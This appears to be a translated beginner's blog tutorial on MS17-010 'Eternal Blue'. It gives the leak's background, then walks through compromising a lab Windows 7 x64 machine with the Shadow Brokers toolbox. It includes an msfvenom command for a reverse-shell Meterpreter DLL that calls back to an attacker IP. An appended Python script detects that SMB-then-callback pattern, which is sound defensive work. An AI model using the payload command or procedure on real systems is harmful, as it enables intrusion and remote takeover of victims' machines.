MS17-010: Capture a computer with "Eternal Blue"
Over the past two days, everyone's social feeds have probably been flooded with news of a piece of ransomware, and some students may have been unlucky enough to be hit by it. So what made this ransomware so rampant?

The story starts with a hacker organization called Equation Group, which has always been closely linked to the National Security Agency (NSA). It is generally believed that Equation Group is a subordinate unit of the NSA. Many security researchers say that the technology held by Equation Group surpasses that of most hacker organizations in complexity and sophistication, and that the group has been active for more than 20 years.

However, this hacker organization was itself broken into by another hacker organization, the "Shadow Brokers" ... (it is so capricious). The Shadow Brokers claimed that they had obtained a large part of Equation Group's hacking tools and decided to sell them publicly.

They expected to make a fortune, but in fact nobody paid them any attention. So the Shadow Brokers decided to disclose some of the valuable tools, and "Eternal Blue" was one of them (vulnerability number MS17-010). So how far does the Eternal Blue exploit reach? Let's put it this way: apart from Windows 10, no system in the Windows family is spared.

As a result, the combination of the Eternal Blue exploit and the WannaCry ransomware produced the largest ransom-payment campaign so far, affecting thousands of enterprises and public organizations in nearly 100 countries.

Next, to satisfy beginners' curiosity, let's discuss how MS17-010 is used to capture a 64-bit Windows 7 machine with the Eternal Blue exploit released by the Shadow Brokers.

Attacker 1 (192.168.1.101):

Linux with Metasploit

Attacker 2 (192.168.1.137):

Windows XP -> Python 2.6 + pywin32 v2.12, which can run the Shadow Brokers toolbox.

Target machine (192.168.1.140):

Windows 7 x64 (ports 139 and 445 open)

Use the Eternal Blue program in the Shadow Brokers toolbox to capture the target machine.

Change the configured path so that it matches the current path of the directory.

Press Enter until you are prompted for the project name, then enter the project name.

Continue pressing Enter.

Keep pressing Enter until the mode selection, where the mode is 1.

Keep pressing Enter until the attack is completed.

Related commands:

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll

Keep pressing Enter until you are asked to select the system architecture. Since the host we want to attack is 64-bit Windows 7, we choose 1 here.

Select 2, DLL injection.
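
From the defender's side, the lab above leaves a recognizable network trace: an inbound SMB connection (port 139 or 445) to the target, followed shortly by an outbound connection from that same target to the listener on port 4444. The Python below is an added example, not part of the original article; the flow-record format, the egress baseline, the five-minute window and the sample records are constructed assumptions.

```python
from datetime import datetime, timedelta

SMB_PORTS = {139, 445}
# Assumed egress baseline and correlation window; tune both to the environment.
EXPECTED_OUT = {53, 80, 123, 443} | SMB_PORTS
WINDOW = timedelta(minutes=5)

# Constructed flow records: time, source, destination, destination port.
SAMPLE_FLOWS = """\
2017-05-14T10:00:01 192.168.1.137 192.168.1.140 445
2017-05-14T10:00:40 192.168.1.140 192.168.1.101 4444
2017-05-14T10:05:00 192.168.1.50 192.168.1.140 445
2017-05-14T10:30:00 192.168.1.140 192.168.1.20 443
2017-05-14T11:00:00 192.168.1.60 192.168.1.141 139
2017-05-14T11:20:00 192.168.1.141 192.168.1.101 4444
"""

def parse(text):
    """Yield (time, src, dst, port) tuples from whitespace-separated records."""
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, port = line.split()
            yield datetime.fromisoformat(ts), src, dst, int(port)

def correlate(text):
    """Flag hosts that open an unusual outbound port soon after inbound SMB."""
    last_smb = {}  # host -> (time, peer) of its most recent inbound SMB flow
    alerts = []
    for ts, src, dst, port in sorted(parse(text)):
        if port in SMB_PORTS:
            last_smb[dst] = (ts, src)
            continue
        seen = last_smb.get(src)
        if seen and port not in EXPECTED_OUT and ts - seen[0] <= WINDOW:
            alerts.append({
                "host": src,
                "smb_from": seen[1],
                "callback": f"{dst}:{port}",
                "delay_s": int((ts - seen[0]).total_seconds()),
            })
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_FLOWS):
        print(alert)
```

Only the first pair of records is flagged; the later connection to port 4444 falls outside the window, and the connection to port 443 is within the assumed baseline.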
